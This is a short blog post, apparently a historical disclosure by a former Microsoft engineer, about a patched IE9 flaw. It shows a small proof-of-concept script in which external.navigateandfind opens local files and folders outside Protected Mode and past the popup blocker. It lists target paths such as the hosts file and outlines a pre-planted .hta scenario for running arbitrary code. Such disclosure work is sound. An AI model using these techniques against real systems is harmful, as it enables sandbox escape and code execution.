IE9: NavigateAndFind Opens Local Folders and Files Outside Protected Mode

I was looking at the external object’s less-travelled methods and found that NavigateAndFind with a non-empty third argument opens a new window pointing at any file:// URL — without any popup blocker intervention and without user interaction. Local folders, text files, and executables all opened without a prompt.

<script language="JavaScript">
function navFind(strURL)
{
    external.navigateandfind(strURL,"","NEW_WINDOW");
}
</script>

<!-- Example targets -->
<!-- file:///c:/ - Opens the C:\ folder -->
<!-- file:///c:/windows/system32/drivers/etc/hosts - Opens the hosts file outside Protected Mode -->
<!-- file:///c:/Users/Default/NTUSER.DAT.LOG - Triggers a download dialog and Notepad outside Protected Mode -->

The pop-up blocker does not intercept windows opened this way, and all of them open outside of Protected Mode. The most serious scenario is when an attacker can pre-plant a local .hta file — clicking to open it would then execute arbitrary code outside the IE sandbox with just one click, and IE’s UI gives no clear warning about what is actually running.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [IE9 UXSS: Generate Error to Grab the Error Handler's Caller Function] :: [IE9: InfoBar URL Spoofing via Navigate2] >